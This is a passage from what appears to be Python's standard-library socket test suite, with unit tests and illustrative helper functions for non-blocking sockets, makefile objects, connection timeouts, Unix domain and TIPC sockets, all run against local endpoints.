self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
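# Illustrative sketch (not executed by the test suite): the non-blocking
# accept pattern NonBlockingTCPTests exercises -- poll the listening socket
# with select() and call accept() only once it is reported readable.
def _example_nonblocking_accept(listener, timeout=1.0):
    listener.setblocking(False)
    readable, _, _ = select.select([listener], [], [], timeout)
    if listener in readable:
        return listener.accept()  # (conn, addr); conn has no timeout set
    return None                   # nothing pending within the timeout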
@unittest.skipUnless(thread, 'Threading required for this test.')
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
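# Illustrative sketch (not executed by the test suite): the makefile() usage
# pattern the FileObjectClassTestCase variants above exercise -- buffered
# file-like readers/writers wrapping a connected SOCK_STREAM socket.
# `conn` is a hypothetical connected socket whose peer echoes a line back.
def _example_makefile_roundtrip(conn):
    wfile = conn.makefile("wb")
    rfile = conn.makefile("rb")
    try:
        wfile.write(b"hello\n")
        wfile.flush()             # buffered: data is only sent on flush/close
        return rfile.readline()   # the peer's reply, newline included
    finally:
        # Closing the file objects does not close the underlying socket.
        rfile.close()
        wfile.close()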
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
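# Illustrative sketch (not executed by the test suite): with bufsize=0 every
# read goes straight to the socket, so a second file object created later
# picks up exactly where the first stopped -- the property http.client
# depends on when reading several responses from one connection.
# `conn` is a hypothetical connected socket whose peer sends two lines.
def _example_unbuffered_readers(conn):
    first = conn.makefile("rb", 0)
    line1 = first.readline()      # consumes only the first line
    second = conn.makefile("rb", 0)
    line2 = second.readline()     # continues with the second line
    first.close()
    second.close()
    return line1, line2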
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
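# Illustrative sketch (not executed by the test suite): typical error handling
# around create_connection(), which tries every address getaddrinfo() returns
# and re-raises the last failure -- e.g. ECONNREFUSED, or ENETUNREACH on
# Solaris -- while a timed-out attempt surfaces as socket.timeout.
def _example_create_connection(host, port):
    try:
        return socket.create_connection((host, port), timeout=5)
    except socket.timeout:
        return None               # the connect attempt timed out
    except OSError as exc:
        raise RuntimeError("could not connect to %s:%s: %s" % (host, port, exc))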
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
try:
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
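# Illustrative sketch (not executed by the test suite): binding to the Linux
# abstract namespace -- an AF_UNIX name starting with a NUL byte that never
# appears on the filesystem, so no unlink() cleanup is needed.  Linux-only;
# the default name below is purely illustrative.
def _example_abstract_namespace_server(name=b"\x00example-abstract-socket"):
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    srv.bind(name)                # no socket file is created
    srv.listen()
    return srv                    # getsockname() returns the bytes name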
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
sock.bind(path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
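# Illustrative sketch (not executed by the test suite): binding an AF_UNIX
# socket to a filesystem path, as TestUnixDomain does above.  Unlike abstract
# names, the socket file persists, so callers must os.unlink() it afterwards
# or a later bind() to the same path fails.
def _example_unix_path_server(path):
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        srv.bind(path)            # creates a socket file at `path`
        srv.listen()
    except OSError:
        srv.close()
        raise
    return srv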
@unittest.skipUnless(thread, 'Threading required for this test.')
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
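# Illustrative sketch (not executed by the test suite): filling a
# preallocated buffer with recv_into(), the copy-avoiding style BufferIOTest
# exercises above; a memoryview lets each call write past the bytes already
# received without creating intermediate copies.
def _example_recv_exactly(conn, size):
    buf = bytearray(size)
    view = memoryview(buf)
    received = 0
    while received < size:
        n = conn.recv_into(view[received:])
        if n == 0:                # peer closed the connection early
            break
        received += n
    return bytes(buf[:received])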
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
if not os.path.isfile("/proc/modules"):
return False
with open("/proc/modules") as f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
